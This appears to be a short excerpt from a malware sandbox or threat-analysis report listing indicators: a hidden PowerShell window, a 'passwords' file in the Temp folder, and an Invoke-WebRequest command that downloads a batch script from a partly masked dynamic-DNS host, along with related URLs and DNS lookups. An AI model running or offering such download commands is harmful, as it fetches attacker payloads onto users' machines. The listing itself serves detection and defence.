Technical Information
- '<SYSTEM32>\notepad.exe' %LOCALAPPDATA%\Temp/passwords
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -w 1 -c echo test
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -command "& { iwr http://ce####aw.ddns.net/dl/sc.bat -OutFile $env:TEMP\sc.bat }"
- http://ce####aw.ddns.net/dl/sc.ps1
- %TEMP%\passwords
- 'ce####aw.ddns.net':80
- DNS ASK ce####aw.ddns.net